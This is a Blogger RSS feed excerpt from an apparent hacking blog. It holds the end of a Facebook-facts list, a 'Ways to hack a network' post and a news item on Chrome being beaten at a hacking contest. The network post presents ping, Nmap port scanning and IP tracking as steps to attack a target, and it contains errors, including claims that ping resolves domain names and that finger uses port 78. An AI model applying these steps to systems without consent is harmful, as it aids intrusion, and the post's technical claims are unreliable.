&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;An October 2009 study by Retrevo suggested that social networks are becoming an increasingly important part of young people's lives. Among under-35s, 36% admitted to "tweeting, texting and checking Facebook after sex." Forty percent of respondents admitted to doing so while driving, 64% said they do so at work, and 65% use these communication channels while on vacation.&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://articles.cnn.com/2011-05-26/tech/facebook.facts.cashmore_1_facebook-users-facebook-friends-facebook-updates/3?_s=PM:TECH" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;Over 350million people suffer from Facebook Addiction Disorder&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="Over 350million people suffer from Facebook Addiction Disorder" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_7-addiction2.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;Facebook Addiction Disorder (FAD) is a term introduced by US phychologists for those who are addicted to Facebook and their life is really affected by their uncontrolled activities on Facebook. The most common effects are the loss of productivity, the inability to concentrate, the superficiality of friendships as well as isolation in the extreme cases.&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;It has been said that approximately 350 million people are suffering from the disorder.&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://socialtimes.com/facebook-addiction-disorder-the-6-symptoms-of-f-a-d_b60403" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;Facebook users have lower grades than non-users&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="Facebook users have lower grades than non-users" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_8-bad-student.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;According to a new study by doctoral candidate Aryn Karpinski of Ohio State University and her co-author Adam Duberstein of Ohio Dominican University, college students who use the 800 million–member social network have significantly lower grade-point averages (GPAs) than those who do not.&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;The study, made in 2009, surveyed 219 undergraduate and graduate students and found that GPAs of Facebook users typically ranged a full grade point lower than those of nonusers — 3.0 to 3.5 for users versus 3.5 to 4.0 for their non-networking peers. It also found that 79% of Facebook members did not believe there was any link between their GPA and their networking habits.&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://www.time.com/time/business/article/0,8599,1891111,00.html" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;Burger King gave away free burgers to users who unfriended people on Facebook&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="Burger King gave away free burgers to users who unfriended people on Facebook" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_9-whopper.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;In January 2009, an advertising campaign from Burger King titled “WHOPPER Sacrifice” rewarded Facebook users a free “Angry Whopper” for publicly deleting 10 friends, who would then receive a blunt message informing they were deleted for a free hamburger. The campaign, conceived by Burger King agency Crispin Porter + Bogusky and executed by Refresh Partners, used the tag line “Friendship Is Strong, but The Whopper Is Stronger.”&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;At press time the application had been downloaded more than 55,000 times and over 250,000 ‘friends' were sacrificed.&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://promomagazine.com/news/burger_king_toss_question_0112/" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;A man was arrested for openly asking his 13-year-old daughter for sex over Facebook&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="A man was arrested for openly asking his 13-year-old daughter for sex over Facebook" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_10-man-arrested.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;On perhaps one of the worst crimes perpetrated in Facebook, a Pennsylvania father was arrested for allegedly asking his teen daughter for sex over Facebook. John Forehand, 39, referred to himself as "Bad Daddy" in the online correspondence with his 13 year-old daughter, in which he openly propositioned her and made explicit sexual suggestions. Forehand told his daughter he had been having "inappropriate" dreams about her, and wrote to her, "I'll take very good care of my little girl."&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;The girl told her mother about the inappropriate Facebook messages, and she then alerted the police. The police captured Forehand by tricking him into coming to what he believed would be a meeting with his daughter. How sick is that?&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://www.huffingtonpost.com/2009/10/12/john-forehand-man-asked-d_n_317148.html" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;Read more at&amp;nbsp;&lt;a href="http://www.oddee.com/item_97980.aspx#vCG7MTqwCS5DpeBu.99" style="color: #003399;"&gt;http://www.oddee.com/item_97980.aspx#vCG7MTqwCS5DpeBu.99&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #444444; font-size: x-large;"&gt;____----Our hack is yours----____&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #444444; font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #444444; font-size: x-large;"&gt;Thanks for your interest in my blog please like,comment and share...&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #444444; font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;Your blogger&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://www.mylivesignature.com/" target="_blank"&gt;&lt;img src="https://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: transparent; border: 0 !important;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY_L4aV1mXGZme0hnIct35cFc1sTRJEhPNmehtCC4M3bBSyG_tfRz4UjJVao-TeusT_TaOoirWuVwgLjWCnronI8rA32rd-pjyz183WXqfSaSw1nxWGgosb19_wzk8CPwzvykiyUboj_s/s72-c/AAEAAQAAAAAAAAr6AAAAJDg2YmZlNzcwLTZiNWItNDNlMS1hMGUzLWY5NTNhYWYyMmQ2Yg.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Ways to hack a network</title><link>https://snacksofhacks.blogspot.com/2013/02/ways-to-hack-network.html</link><category>HaCkinG</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 9 Feb 2013 18:50:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-5518948694861986744</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;H&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: medium;"&gt;i, readers do you ever wondered to know how hackers hack a network or server.&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_KmD9UzF1L65jsoFBMB-Oz9G_bWQeVMGOU3BUhujl_pMDVIfTknrW6p0rA1KsSoTv-PT8N507P0cCgd-ZNCU9o8QHQwZEWFQLyC19t_tfBwnHz2-vz6Y1t2SP-DNaqra1yucrmeWXBd4/s1600/nw+hacck.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="715" data-original-width="961" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_KmD9UzF1L65jsoFBMB-Oz9G_bWQeVMGOU3BUhujl_pMDVIfTknrW6p0rA1KsSoTv-PT8N507P0cCgd-ZNCU9o8QHQwZEWFQLyC19t_tfBwnHz2-vz6Y1t2SP-DNaqra1yucrmeWXBd4/s320/nw+hacck.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;span style="font-size: medium;"&gt;Today I eagerly want to tell you the procedure of hacking a network don't panic or get excited and this post may change your career into would be hacker.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;Now listen carefully, the main thing that you should have is patience because things get hard while hacking,sometimes you are forced to give up.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;so,my advice is "Don't enter into the world of hacking without having patience and eager to get skills" and many of you will be searching for shortcuts to become hacker very quickly if you do so you are not a eligible person to become hacker.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #cc0000; font-size: medium;"&gt;There are no shortcuts to become a hacker&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000; font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;Now,let's start hacking.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;First you must have the ip address of the target network.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;you can get it by following the simple steps on&amp;nbsp;&lt;a href="http://www.spypig.com/" target="_blank"&gt;SPY PIG&lt;/a&gt;&amp;nbsp;(if your target is a computer).&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;If you get the Ip address of target computer then you have to ping it by using command.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #e69138; font-size: small;"&gt;1.Ping:&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-size: medium;"&gt;The ip address give the target's internet address.the numerical address like 198.192.168.72 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS:The domain name service(DNS) protocol reveals the matching domain name.Ping stands for "&lt;b&gt;Packet Internet Groper&lt;/b&gt;".&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;Make sure you are logged on to the net.Open the COMMAND shell and enter the following PING commmand:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;Eg: Ping 192.168.010.001&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;ping will search the domain name and reveal it.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;Pinging is normally the first step involved in hacking the target.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #e69138; font-size: small;"&gt;2.Port scanning:&lt;/span&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;After you have determined that your target system is alive the next important step would be to perform a port scan on the target system using IP address.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;There are a wide range of port scanners available for free but many of them uses outdated techinques for port scanning which could be easily recognized by the network administrator personally I like to use Nmap you can download it from&amp;nbsp;&lt;a href="http://www.insecure.org/" target="_blank"&gt;Here&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;which has a wide range of options,you can download the Nmap win and its source code from&amp;nbsp;&lt;a href="http://www.sourceforge.net/projects/nmapwin." target="_blank"&gt;Here&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;Apart from port scanning Nmap is capable of identifying the operating system being used by the target computer,version numbers of various services running,firewalls being used and a lot more.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: orange; font-size: small;"&gt;Common ports:&lt;/span&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;Below is a list of some common ports and the respective services running on the ports.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;20-FTP DATA(File Transfer Protocol)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;21-FTP(File Transfer Protocol)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;22-SSH&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;23-TELNET&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;25-SMTP(Simple Mail Transfer Protocol)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;53-DNS(Domain Name Service)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;68-DHCP(Dynamic Host COnfiguration Protocol)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;78-FINGER&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;80-HTTP(Hyper Text Transfer Protocol)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;110-POP3(Post Office Protocol,version 3)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;137-NETBIOS-ns&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;138-NETBIOS-dgm&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;139-NETBIOS&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;143-IMAP(Internet Message Access Protocol)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;161-SNMP(Simple Network Management Protocol)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;194-IRC(Internet Relay Chat)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;220-IMAP3(Internet Message Access Protocol 3)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;389-LDAP&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;443-SSL(Secure Socket Layer)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;445-SMB(Net Bios over TCP)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;Besides the above ports there are even some ports known as TROJAN ports used by trojans that allow remote access to that system.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;Using these things hackers get into your system remotely.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;Also visit my other post which tell about protecting your computer from this type of hacking....&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;Take time to like,comment and share.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;Feel free to ask questions i'm glad to here from you..&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_KmD9UzF1L65jsoFBMB-Oz9G_bWQeVMGOU3BUhujl_pMDVIfTknrW6p0rA1KsSoTv-PT8N507P0cCgd-ZNCU9o8QHQwZEWFQLyC19t_tfBwnHz2-vz6Y1t2SP-DNaqra1yucrmeWXBd4/s72-c/nw+hacck.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Google chrome hacked in 5 mins.</title><link>https://snacksofhacks.blogspot.com/2013/01/google-chrome-hacked-in-5-mins.html</link><category>HaCkinG</category><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 26 Jan 2013 18:16:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-5408419658539395957</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;span style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; line-height: 24px;"&gt;&lt;span style="font-size: x-large;"&gt;H&lt;/span&gt;&lt;/span&gt;&lt;span style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px;"&gt;&lt;b&gt;ackers have defeated Google Chrome for the first time in an annual competition to test the security of the most popular web browser.&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;div class="post-header" style="border: 0px; color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;div class="post-header-line-1" style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="postcover" style="border: 0px; color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;div dir="ltr" style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" trbidi="on"&gt;
&lt;div class="separator" style="border: 0px; clear: both; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZlbErbpjCIkEB57EVMVMZLTwgsBrQC51Kpy_80E8Y3HgRqyntwN64m_VkoYUn3Ef0tUqEHkv9KcFbOyRKze1kF1KfHo4y-a20l1706SYrQCkf-4FRZkOnczRhYAxGlgdEPBM2kU5uHMTg/s1600/crme.JPG" imageanchor="1" style="border: 0px; clear: left; color: #d94e00; float: left; margin: 0px 1em 1em 0px; outline: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"&gt;&lt;span style="background-color: #f3f3f3;"&gt;&lt;img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZlbErbpjCIkEB57EVMVMZLTwgsBrQC51Kpy_80E8Y3HgRqyntwN64m_VkoYUn3Ef0tUqEHkv9KcFbOyRKze1kF1KfHo4y-a20l1706SYrQCkf-4FRZkOnczRhYAxGlgdEPBM2kU5uHMTg/s320/crme.JPG" style="border: 1px solid rgb(227, 227, 227); margin: 0px; max-width: 100%; outline: 0px; padding: 0px; vertical-align: baseline;" width="320" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;span style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px;"&gt;“We wanted to show that Chrome was not unbreakable. Last year, we saw a lot of headlines that no one could hack Chrome. We wanted to make sure it was the first to fall this year,” The Telegraph quoted firm’s research head Chaouki Bekrar, as saying.&lt;/span&gt;&lt;br /&gt;&lt;br style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; padding: 0px;" /&gt;&lt;br style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; padding: 0px;" /&gt;&lt;span style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px;"&gt;Bekrar said his team had worked for six weeks ahead of the competition to explore vulnerabilities.&lt;/span&gt;&lt;br style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; padding: 0px;" /&gt;&lt;span style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px;"&gt;He added that his company had also devised a procedure to hack into Firefox and Internet Explorer, but wanted to first demonstrate that Chrome was not invincible.&lt;/span&gt;&lt;br style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; padding: 0px;" /&gt;&lt;span style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px;"&gt;Vupen had earlier used two previously unknown vulnerabilities to beat Chrome's security, which is perceived to be stronger than rivals Firefox and Internet Explorer because of its use of “sandboxing”.&lt;/span&gt;&lt;br style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; padding: 0px;" /&gt;&lt;br style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; padding: 0px;" /&gt;&lt;span style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px;"&gt;`&amp;nbsp;&lt;/span&gt;&lt;br style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px; margin: 0px; padding: 0px;" /&gt;&lt;span style="color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: 12px; line-height: 24px;"&gt;Vupen said it would keep details of how it bypassed Google's sandbox technology private "for our customers".&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span style="background-color: #f3f3f3; color: #666666; font-family: Verdana, 'Open Sans', sans-serif; line-height: 24px;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="background-color: #f3f3f3; color: #666666; font-family: Verdana, 'Open Sans', sans-serif; font-size: large; line-height: 24px;"&gt;Your bloggers KT,KK.&lt;/span&gt;&lt;/div&gt;
&lt;span style="color: #666666; font-family: Verdana, Open Sans, sans-serif; font-size: large;"&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="background-color: #f3f3f3; line-height: 24px;"&gt;____----OUR HACK IS YOURS----____&lt;/span&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
